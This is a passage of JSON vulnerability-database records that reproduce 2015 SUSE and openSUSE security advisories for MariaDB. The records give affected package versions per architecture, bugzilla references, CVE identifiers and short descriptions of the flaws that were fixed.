"https://bugzilla.suse.com/936407", "https://bugzilla.suse.com/906574", "https://bugzilla.suse.com/919053", "https://bugzilla.suse.com/920896", "https://bugzilla.suse.com/924960", "https://bugzilla.suse.com/919062", "https://bugzilla.suse.com/924961", "https://bugzilla.suse.com/934789", "https://bugzilla.suse.com/921333", "https://bugzilla.suse.com/936409", "https://bugzilla.suse.com/924663"], "affectedPackage": [{"OS": "SUSE Linux Enterprise Desktop", "OSVersion": "12", "packageVersion": "10.0.20-18.1", "packageName": "mariadb-errormessages", "packageFilename": "mariadb-errormessages-10.0.20-18.1.x86_64.rpm", "arch": "x86_64", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Software Development Kit", "OSVersion": "12", "packageVersion": "10.0.20-18.1", "packageName": "libmysqld18-debuginfo", "packageFilename": "libmysqld18-debuginfo-10.0.20-18.1.x86_64.rpm", "arch": "x86_64", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Desktop", "OSVersion": "12", "packageVersion": "10.0.20-18.1", "packageName": "mariadb-debugsource", "packageFilename": "mariadb-debugsource-10.0.20-18.1.x86_64.rpm", "arch": "x86_64", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "12", "packageVersion": "10.0.20-18.1", "packageName": "mariadb-errormessages", "packageFilename": "mariadb-errormessages-10.0.20-18.1.s390x.rpm", "arch": "s390x", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Software Development Kit", "OSVersion": "12", "packageVersion": "10.0.20-18.1", "packageName": "libmysqlclient_r18", "packageFilename": "libmysqlclient_r18-10.0.20-18.1.s390x.rpm", "arch": "s390x", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "12", "packageVersion": "10.0.20-18.1", "packageName": "libmysqlclient18", "packageFilename": "libmysqlclient18-10.0.20-18.1.x86_64.rpm", "arch": "x86_64", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "12", "packageVersion": "10.0.20-18.1", "packageName": "mariadb-client-debuginfo", "packageFilename": "mariadb-client-debuginfo-10.0.20-18.1.s390x.rpm", "arch": "s390x", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Software Development Kit", "OSVersion": "12", "packageVersion": "10.0.20-18.1", "packageName": "libmysqld18-debuginfo", "packageFilename": "libmysqld18-debuginfo-10.0.20-18.1.ppc64le.rpm", "arch": "ppc64le", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Desktop", "OSVersion": "12", "packageVersion": "10.0.20-18.1", "packageName": "mariadb-debuginfo", "packageFilename": "mariadb-debuginfo-10.0.20-18.1.x86_64.rpm", "arch": "x86_64", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "12", "packageVersion": "10.0.20-18.1", "packageName": "mariadb-debuginfo", "packageFilename": "mariadb-debuginfo-10.0.20-18.1.ppc64le.rpm", "arch": "ppc64le", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Workstation Extension", "OSVersion": "12", "packageVersion": "10.0.20-18.1", "packageName": "libmysqlclient_r18-32bit", "packageFilename": "libmysqlclient_r18-32bit-10.0.20-18.1.x86_64.rpm", "arch": "x86_64", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "12", "packageVersion": "10.0.20-18.1", "packageName": "mariadb", "packageFilename": "mariadb-10.0.20-18.1.ppc64le.rpm", "arch": "ppc64le", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Software Development Kit", "OSVersion": "12", "packageVersion": "10.0.20-18.1", "packageName": "libmysqld18", "packageFilename": "libmysqld18-10.0.20-18.1.s390x.rpm", "arch": "s390x", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "12", "packageVersion": "10.0.20-18.1", "packageName": "libmysqlclient18-debuginfo-32bit", "packageFilename": "libmysqlclient18-debuginfo-32bit-10.0.20-18.1.x86_64.rpm", "arch": "x86_64", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Software Development Kit", "OSVersion": "12", "packageVersion": "10.0.20-18.1", "packageName": "libmysqlclient_r18", "packageFilename": "libmysqlclient_r18-10.0.20-18.1.x86_64.rpm", "arch": "x86_64", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "12", "packageVersion": "10.0.20-18.1", "packageName": "mariadb-client", "packageFilename": "mariadb-client-10.0.20-18.1.x86_64.rpm", "arch": "x86_64", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "12", "packageVersion": "10.0.20-18.1", "packageName": "mariadb-errormessages", "packageFilename": "mariadb-errormessages-10.0.20-18.1.x86_64.rpm", "arch": "x86_64", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Software Development Kit", "OSVersion": "12", "packageVersion": "10.0.20-18.1", "packageName": "libmysqld18-debuginfo", "packageFilename": "libmysqld18-debuginfo-10.0.20-18.1.s390x.rpm", "arch": "s390x", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "12", "packageVersion": "10.0.20-18.1", "packageName": "mariadb-tools", "packageFilename": "mariadb-tools-10.0.20-18.1.s390x.rpm", "arch": "s390x", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Software Development Kit", "OSVersion": "12", "packageVersion": "10.0.20-18.1", "packageName": "libmysqld-devel", "packageFilename": "libmysqld-devel-10.0.20-18.1.x86_64.rpm", "arch": "x86_64", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "12", "packageVersion": "10.0.20-18.1", "packageName": "mariadb-debuginfo", "packageFilename": "mariadb-debuginfo-10.0.20-18.1.x86_64.rpm", "arch": "x86_64", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Desktop", "OSVersion": "12", "packageVersion": "10.0.20-18.1", "packageName": "libmysqlclient_r18-32bit", "packageFilename": "libmysqlclient_r18-32bit-10.0.20-18.1.x86_64.rpm", "arch": "x86_64", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "12", "packageVersion": "10.0.20-18.1", "packageName": "mariadb-debugsource", "packageFilename": "mariadb-debugsource-10.0.20-18.1.ppc64le.rpm", "arch": "ppc64le", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Workstation Extension", "OSVersion": "12", "packageVersion": "10.0.20-18.1", "packageName": "libmysqlclient_r18", "packageFilename": "libmysqlclient_r18-10.0.20-18.1.x86_64.rpm", "arch": "x86_64", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Desktop", "OSVersion": "12", "packageVersion": "10.0.20-18.1", "packageName": "mariadb", "packageFilename": "mariadb-10.0.20-18.1.x86_64.rpm", "arch": "x86_64", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "12", "packageVersion": "10.0.20-18.1", "packageName": "mariadb-debugsource", "packageFilename": "mariadb-debugsource-10.0.20-18.1.x86_64.rpm", "arch": "x86_64", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "12", "packageVersion": "10.0.20-18.1", "packageName": "mariadb-client-debuginfo", "packageFilename": "mariadb-client-debuginfo-10.0.20-18.1.x86_64.rpm", "arch": "x86_64", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Software Development Kit", "OSVersion": "12", "packageVersion": "10.0.20-18.1", "packageName": "mariadb-debugsource", "packageFilename": "mariadb-debugsource-10.0.20-18.1.x86_64.rpm", "arch": "x86_64", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "12", "packageVersion": "10.0.20-18.1", "packageName": "libmysqlclient18", "packageFilename": "libmysqlclient18-10.0.20-18.1.s390x.rpm", "arch": "s390x", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "12", "packageVersion": "10.0.20-18.1", "packageName": "libmysqlclient18-32bit", "packageFilename": "libmysqlclient18-32bit-10.0.20-18.1.s390x.rpm", "arch": "s390x", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "12", "packageVersion": "10.0.20-18.1", "packageName": "libmysqlclient18-debuginfo", "packageFilename": "libmysqlclient18-debuginfo-10.0.20-18.1.ppc64le.rpm", "arch": "ppc64le", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Software Development Kit", "OSVersion": "12", "packageVersion": "10.0.20-18.1", "packageName": "mariadb-debuginfo", "packageFilename": "mariadb-debuginfo-10.0.20-18.1.s390x.rpm", "arch": "s390x", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Desktop", "OSVersion": "12", "packageVersion": "10.0.20-18.1", "packageName": "mariadb-client", "packageFilename": "mariadb-client-10.0.20-18.1.x86_64.rpm", "arch": "x86_64", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "12", "packageVersion": "10.0.20-18.1", "packageName": "mariadb-debuginfo", "packageFilename": "mariadb-debuginfo-10.0.20-18.1.s390x.rpm", "arch": "s390x", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "12", "packageVersion": "10.0.20-18.1", "packageName": "mariadb-errormessages", "packageFilename": "mariadb-errormessages-10.0.20-18.1.ppc64le.rpm", "arch": "ppc64le", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "12", "packageVersion": "10.0.20-18.1", "packageName": "mariadb-client-debuginfo", "packageFilename": "mariadb-client-debuginfo-10.0.20-18.1.ppc64le.rpm", "arch": "ppc64le", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "12", "packageVersion": "10.0.20-18.1", "packageName": "mariadb-tools-debuginfo", "packageFilename": "mariadb-tools-debuginfo-10.0.20-18.1.x86_64.rpm", "arch": "x86_64", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "12", "packageVersion": "10.0.20-18.1", "packageName": "mariadb", "packageFilename": "mariadb-10.0.20-18.1.x86_64.rpm", "arch": "x86_64", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Software Development Kit", "OSVersion": "12", "packageVersion": "10.0.20-18.1", "packageName": "libmysqld-devel", "packageFilename": "libmysqld-devel-10.0.20-18.1.ppc64le.rpm", "arch": "ppc64le", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "12", "packageVersion": "10.0.20-18.1", "packageName": "mariadb", "packageFilename": "mariadb-10.0.20-18.1.s390x.rpm", "arch": "s390x", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "12", "packageVersion": "10.0.20-18.1", "packageName": "libmysqlclient18-32bit", "packageFilename": "libmysqlclient18-32bit-10.0.20-18.1.x86_64.rpm", "arch": "x86_64", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "12", "packageVersion": "10.0.20-18.1", "packageName": "mariadb-client", "packageFilename": "mariadb-client-10.0.20-18.1.s390x.rpm", "arch": "s390x", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "12", "packageVersion": "10.0.20-18.1", "packageName": "libmysqlclient18", "packageFilename": "libmysqlclient18-10.0.20-18.1.ppc64le.rpm", "arch": "ppc64le", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Software Development Kit", "OSVersion": "12", "packageVersion": "10.0.20-18.1", "packageName": "libmysqlclient-devel", "packageFilename": "libmysqlclient-devel-10.0.20-18.1.ppc64le.rpm", "arch": "ppc64le", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "12", "packageVersion": "10.0.20-18.1", "packageName": "libmysqlclient18-debuginfo-32bit", "packageFilename": "libmysqlclient18-debuginfo-32bit-10.0.20-18.1.s390x.rpm", "arch": "s390x", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Software Development Kit", "OSVersion": "12", "packageVersion": "10.0.20-18.1", "packageName": "libmysqld18", "packageFilename": "libmysqld18-10.0.20-18.1.x86_64.rpm", "arch": "x86_64", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Software Development Kit", "OSVersion": "12", "packageVersion": "10.0.20-18.1", "packageName": "libmysqlclient_r18", "packageFilename": "libmysqlclient_r18-10.0.20-18.1.ppc64le.rpm", "arch": "ppc64le", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Desktop", "OSVersion": "12", "packageVersion": "10.0.20-18.1", "packageName": "libmysqlclient18-debuginfo", "packageFilename": "libmysqlclient18-debuginfo-10.0.20-18.1.x86_64.rpm", "arch": "x86_64", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Desktop", "OSVersion": "12", "packageVersion": "10.0.20-18.1", "packageName": "libmysqlclient18", "packageFilename": "libmysqlclient18-10.0.20-18.1.x86_64.rpm", "arch": "x86_64", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Software Development Kit", "OSVersion": "12", "packageVersion": "10.0.20-18.1", "packageName": "libmysqlclient-devel", "packageFilename": "libmysqlclient-devel-10.0.20-18.1.x86_64.rpm", "arch": "x86_64", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Desktop", "OSVersion": "12", "packageVersion": "10.0.20-18.1", "packageName": "libmysqlclient_r18", "packageFilename": "libmysqlclient_r18-10.0.20-18.1.x86_64.rpm", "arch": "x86_64", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Software Development Kit", "OSVersion": "12", "packageVersion": "10.0.20-18.1", "packageName": "mariadb-debugsource", "packageFilename": "mariadb-debugsource-10.0.20-18.1.s390x.rpm", "arch": "s390x", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Desktop", "OSVersion": "12", "packageVersion": "10.0.20-18.1", "packageName": "libmysqlclient18-32bit", "packageFilename": "libmysqlclient18-32bit-10.0.20-18.1.x86_64.rpm", "arch": "x86_64", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Workstation Extension", "OSVersion": "12", "packageVersion": "10.0.20-18.1", "packageName": "mariadb-debugsource", "packageFilename": "mariadb-debugsource-10.0.20-18.1.x86_64.rpm", "arch": "x86_64", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "12", "packageVersion": "10.0.20-18.1", "packageName": "libmysqlclient18-debuginfo", "packageFilename": "libmysqlclient18-debuginfo-10.0.20-18.1.x86_64.rpm", "arch": "x86_64", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Software Development Kit", "OSVersion": "12", "packageVersion": "10.0.20-18.1", "packageName": "libmysqld18", "packageFilename": "libmysqld18-10.0.20-18.1.ppc64le.rpm", "arch": "ppc64le", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "12", "packageVersion": "10.0.20-18.1", "packageName": "mariadb-tools", "packageFilename": "mariadb-tools-10.0.20-18.1.ppc64le.rpm", "arch": "ppc64le", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Software Development Kit", "OSVersion": "12", "packageVersion": "10.0.20-18.1", "packageName": "mariadb-debuginfo", "packageFilename": "mariadb-debuginfo-10.0.20-18.1.x86_64.rpm", "arch": "x86_64", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Workstation Extension", "OSVersion": "12", "packageVersion": "10.0.20-18.1", "packageName": "mariadb-debuginfo", "packageFilename": "mariadb-debuginfo-10.0.20-18.1.x86_64.rpm", "arch": "x86_64", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "12", "packageVersion": "10.0.20-18.1", "packageName": "mariadb-tools-debuginfo", "packageFilename": "mariadb-tools-debuginfo-10.0.20-18.1.ppc64le.rpm", "arch": "ppc64le", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Desktop", "OSVersion": "12", "packageVersion": "10.0.20-18.1", "packageName": "mariadb-client-debuginfo", "packageFilename": "mariadb-client-debuginfo-10.0.20-18.1.x86_64.rpm", "arch": "x86_64", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "12", "packageVersion": "10.0.20-18.1", "packageName": "mariadb-debugsource", "packageFilename": "mariadb-debugsource-10.0.20-18.1.s390x.rpm", "arch": "s390x", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Desktop", "OSVersion": "12", "packageVersion": "10.0.20-18.1", "packageName": "libmysqlclient18-debuginfo-32bit", "packageFilename": "libmysqlclient18-debuginfo-32bit-10.0.20-18.1.x86_64.rpm", "arch": "x86_64", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "12", "packageVersion": "10.0.20-18.1", "packageName": "mariadb-client", "packageFilename": "mariadb-client-10.0.20-18.1.ppc64le.rpm", "arch": "ppc64le", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Software Development Kit", "OSVersion": "12", "packageVersion": "10.0.20-18.1", "packageName": "libmysqld-devel", "packageFilename": "libmysqld-devel-10.0.20-18.1.s390x.rpm", "arch": "s390x", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "12", "packageVersion": "10.0.20-18.1", "packageName": "mariadb-tools-debuginfo", "packageFilename": "mariadb-tools-debuginfo-10.0.20-18.1.s390x.rpm", "arch": "s390x", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Software Development Kit", "OSVersion": "12", "packageVersion": "10.0.20-18.1", "packageName": "mariadb-debuginfo", "packageFilename": "mariadb-debuginfo-10.0.20-18.1.ppc64le.rpm", "arch": "ppc64le", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Software Development Kit", "OSVersion": "12", "packageVersion": "10.0.20-18.1", "packageName": "libmysqlclient-devel", "packageFilename": "libmysqlclient-devel-10.0.20-18.1.s390x.rpm", "arch": "s390x", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "12", "packageVersion": "10.0.20-18.1", "packageName": "libmysqlclient18-debuginfo", "packageFilename": "libmysqlclient18-debuginfo-10.0.20-18.1.s390x.rpm", "arch": "s390x", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "12", "packageVersion": "10.0.20-18.1", "packageName": "mariadb-tools", "packageFilename": "mariadb-tools-10.0.20-18.1.x86_64.rpm", "arch": "x86_64", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Software Development Kit", "OSVersion": "12", "packageVersion": "10.0.20-18.1", "packageName": "mariadb-debugsource", "packageFilename": "mariadb-debugsource-10.0.20-18.1.ppc64le.rpm", "arch": "ppc64le", "operator": "lt"}], "description": "This update fixes the following security issues:\n * Logjam attack: mysql uses 512 bit dh groups in SSL [bnc#934789]\n * CVE-2015-3152: mysql --ssl does not enforce SSL [bnc#924663]\n * CVE-2014-8964: heap buffer overflow [bnc#906574]\n * CVE-2015-2325: heap buffer overflow in compile_branch() [bnc#924960]\n * CVE-2015-2326: heap buffer overflow in pcre_compile2() [bnc#924961]\n * CVE-2015-0501: unspecified vulnerability related to Server:Compiling\n (CPU April 2015)\n * CVE-2015-2571: unspecified vulnerability related to Server:Optimizer\n (CPU April 2015)\n * CVE-2015-0505: unspecified vulnerability related to Server:DDL (CPU\n April 2015)\n * CVE-2015-0499: unspecified vulnerability related to Server:Federated\n (CPU April 2015)\n * CVE-2015-2568: unspecified vulnerability related to\n Server:Security:Privileges (CPU April 2015)\n * CVE-2015-2573: unspecified vulnerability related to Server:DDL (CPU\n April 2015)\n * CVE-2015-0433: unspecified vulnerability related to\n Server:InnoDB:DML (CPU April 2015)\n * CVE-2015-0441: unspecified vulnerability related to\n Server:Security:Encryption (CPU April 2015)\n\n", "edition": 1, "reporter": "Suse", "published": "2015-07-21T16:08:23", "enchantments": {"score": {"vector": "NONE", "value": 7.5}}, "type": "suse", "title": "Security update for mariadb (important)", "bulletinFamily": "unix", "cvelist": ["CVE-2015-2325", "CVE-2015-2568", "CVE-2015-0501", "CVE-2015-2571", "CVE-2014-8964", "CVE-2015-3152", "CVE-2015-0499", "CVE-2015-0433", "CVE-2015-0441", "CVE-2015-0505", "CVE-2015-2573", "CVE-2015-2326"], "modified": "2015-07-21T16:08:23", "id": "SUSE-SU-2015:1273-1", "href": "http://lists.opensuse.org/opensuse-security-announce/2015-07/msg00036.html", "cvss": {"score": 5.7, "vector": "AV:NETWORK/AC:MEDIUM/Au:MULTIPLE_INSTANCES/C:NONE/I:NONE/A:COMPLETE/"}}, {"lastseen": "2016-09-04T11:56:36", "references": ["https://bugzilla.suse.com/936408", "https://bugzilla.suse.com/914370", "https://bugzilla.suse.com/936407", "https://bugzilla.suse.com/859345", "https://bugzilla.suse.com/934789", "https://bugzilla.suse.com/936409", "https://bugzilla.suse.com/924663"], "affectedPackage": [{"OS": "openSUSE", "OSVersion": "13.2", "packageVersion": "10.0.20-2.9.1", "arch": "i586", "packageFilename": "mariadb-debugsource-10.0.20-2.9.1.i586.rpm", "packageName": "mariadb-debugsource", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "13.2", "packageVersion": "10.0.20-2.9.1", "arch": "x86_64", "packageFilename": "libmysqlclient18-32bit-10.0.20-2.9.1.x86_64.rpm", "packageName": "libmysqlclient18-32bit", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "13.2", "packageVersion": "10.0.20-2.9.1", "arch": "x86_64", "packageFilename": "mariadb-debuginfo-10.0.20-2.9.1.x86_64.rpm", "packageName": "mariadb-debuginfo", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "13.1", "packageVersion": "5.5.44-4.1", "arch": "x86_64", "packageFilename": "libmysqlclient-devel-5.5.44-4.1.x86_64.rpm", "packageName": "libmysqlclient-devel", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "13.2", "packageVersion": "10.0.20-2.9.1", "arch": "x86_64", "packageFilename": "mariadb-errormessages-10.0.20-2.9.1.x86_64.rpm", "packageName": "mariadb-errormessages", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "13.2", "packageVersion": "10.0.20-2.9.1", "arch": "i586", "packageFilename": "libmysqld-devel-10.0.20-2.9.1.i586.rpm", "packageName": "libmysqld-devel", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "13.1", "packageVersion": "5.5.44-4.1", "arch": "i586", "packageFilename": "mariadb-client-debuginfo-5.5.44-4.1.i586.rpm", "packageName": "mariadb-client-debuginfo", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "13.2", "packageVersion": "10.0.20-2.9.1", "arch": "x86_64", "packageFilename": "libmysqld18-10.0.20-2.9.1.x86_64.rpm", "packageName": "libmysqld18", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "13.1", "packageVersion": "5.5.44-4.1", "arch": "x86_64", "packageFilename": "libmysqld18-5.5.44-4.1.x86_64.rpm", "packageName": "libmysqld18", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "13.1", "packageVersion": "5.5.44-4.1", "arch": "x86_64", "packageFilename": "mariadb-5.5.44-4.1.x86_64.rpm", "packageName": "mariadb", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "13.1", "packageVersion": "5.5.44-4.1", "arch": "i586", "packageFilename": "mariadb-tools-5.5.44-4.1.i586.rpm", "packageName": "mariadb-tools", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "13.2", "packageVersion": "10.0.20-2.9.1", "arch": "i586", "packageFilename": "mariadb-client-debuginfo-10.0.20-2.9.1.i586.rpm", "packageName": "mariadb-client-debuginfo", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "13.1", "packageVersion": "5.5.44-4.1", "arch": "x86_64", "packageFilename": "libmysqlclient18-debuginfo-5.5.44-4.1.x86_64.rpm", "packageName": "libmysqlclient18-debuginfo", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "13.2", "packageVersion": "10.0.20-2.9.1", "arch": "i586", "packageFilename": "mariadb-client-10.0.20-2.9.1.i586.rpm", "packageName": "mariadb-client", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "13.1", "packageVersion": "5.5.44-4.1", "arch": "i586", "packageFilename": "mariadb-test-debuginfo-5.5.44-4.1.i586.rpm", "packageName": "mariadb-test-debuginfo", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "13.1", "packageVersion": "5.5.44-4.1", "arch": "x86_64", "packageFilename": "libmysqlclient_r18-32bit-5.5.44-4.1.x86_64.rpm", "packageName": "libmysqlclient_r18-32bit", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "13.1", "packageVersion": "5.5.44-4.1", "arch": "i586", "packageFilename": "libmysqlclient18-debuginfo-5.5.44-4.1.i586.rpm", "packageName": "libmysqlclient18-debuginfo", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "13.2", "packageVersion": "10.0.20-2.9.1", "arch": "i586", "packageFilename": "mariadb-bench-debuginfo-10.0.20-2.9.1.i586.rpm", "packageName": "mariadb-bench-debuginfo", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "13.1", "packageVersion": "5.5.44-4.1", "arch": "i586", "packageFilename": "mariadb-tools-debuginfo-5.5.44-4.1.i586.rpm", "packageName": "mariadb-tools-debuginfo", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "13.2", "packageVersion": "10.0.20-2.9.1", "arch": "i586", "packageFilename": "libmysqlclient18-debuginfo-10.0.20-2.9.1.i586.rpm", "packageName": "libmysqlclient18-debuginfo", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "13.1", "packageVersion": "5.5.44-4.1", "arch": "x86_64", "packageFilename": "libmysqlclient18-32bit-5.5.44-4.1.x86_64.rpm", "packageName": "libmysqlclient18-32bit", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "13.2", "packageVersion": "10.0.20-2.9.1", "arch": "x86_64", "packageFilename": "libmysqlclient18-10.0.20-2.9.1.x86_64.rpm", "packageName": "libmysqlclient18", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "13.1", "packageVersion": "5.5.44-4.1", "arch": "x86_64", "packageFilename": "libmysqld-devel-5.5.44-4.1.x86_64.rpm", "packageName": "libmysqld-devel", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "13.2", "packageVersion": "10.0.20-2.9.1", "arch": "x86_64", "packageFilename": "mariadb-10.0.20-2.9.1.x86_64.rpm", "packageName": "mariadb", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "13.2", "packageVersion": "10.0.20-2.9.1", "arch": "i586", "packageFilename": "libmysqlclient-devel-10.0.20-2.9.1.i586.rpm", "packageName": "libmysqlclient-devel", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "13.2", "packageVersion": "10.0.20-2.9.1", "arch": "x86_64", "packageFilename": "libmysqlclient-devel-10.0.20-2.9.1.x86_64.rpm", "packageName": "libmysqlclient-devel", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "13.1", "packageVersion": "5.5.44-4.1", "arch": "i586", "packageFilename": "libmysqld18-5.5.44-4.1.i586.rpm", "packageName": "libmysqld18", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "13.2", "packageVersion": "10.0.20-2.9.1", "arch": "x86_64", "packageFilename": "libmysqld-devel-10.0.20-2.9.1.x86_64.rpm", "packageName": "libmysqld-devel", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "13.1", "packageVersion": "5.5.44-4.1", "arch": "i586", "packageFilename": "mariadb-client-5.5.44-4.1.i586.rpm", "packageName": "mariadb-client", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "13.1", "packageVersion": "5.5.44-4.1", "arch": "x86_64", "packageFilename": "libmysqlclient18-5.5.44-4.1.x86_64.rpm", "packageName": "libmysqlclient18", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "13.2", "packageVersion": "10.0.20-2.9.1", "arch": "i586", "packageFilename": "mariadb-bench-10.0.20-2.9.1.i586.rpm", "packageName": "mariadb-bench", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "13.1", "packageVersion": "5.5.44-4.1", "arch": "x86_64", "packageFilename": "mariadb-debuginfo-5.5.44-4.1.x86_64.rpm", "packageName": "mariadb-debuginfo", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "13.2", "packageVersion": "10.0.20-2.9.1", "arch": "i586", "packageFilename": "mariadb-errormessages-10.0.20-2.9.1.i586.rpm", "packageName": "mariadb-errormessages", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "13.1", "packageVersion": "5.5.44-4.1", "arch": "x86_64", "packageFilename": "mariadb-errormessages-5.5.44-4.1.x86_64.rpm", "packageName": "mariadb-errormessages", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "13.2", "packageVersion": "10.0.20-2.9.1", "arch": "x86_64", "packageFilename": "libmysqlclient_r18-10.0.20-2.9.1.x86_64.rpm", "packageName": "libmysqlclient_r18", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "13.2", "packageVersion": "10.0.20-2.9.1", "arch": "i586", "packageFilename": "mariadb-tools-10.0.20-2.9.1.i586.rpm", "packageName": "mariadb-tools", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "13.1", "packageVersion": "5.5.44-4.1", "arch": "i586", "packageFilename": "mariadb-test-5.5.44-4.1.i586.rpm", "packageName": "mariadb-test", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "13.2", "packageVersion": "10.0.20-2.9.1", "arch": "i586", "packageFilename": "mariadb-10.0.20-2.9.1.i586.rpm", "packageName": "mariadb", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "13.2", "packageVersion": "10.0.20-2.9.1", "arch": "i586", "packageFilename": "libmysqld18-10.0.20-2.9.1.i586.rpm", "packageName": "libmysqld18", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "13.1", "packageVersion": "5.5.44-4.1", "arch": "x86_64", "packageFilename": "libmysqld18-debuginfo-5.5.44-4.1.x86_64.rpm", "packageName": "libmysqld18-debuginfo", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "13.2", "packageVersion": "10.0.20-2.9.1", "arch": "x86_64", "packageFilename": "mariadb-tools-10.0.20-2.9.1.x86_64.rpm", "packageName": "mariadb-tools", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "13.1", "packageVersion": "5.5.44-4.1", "arch": "x86_64", 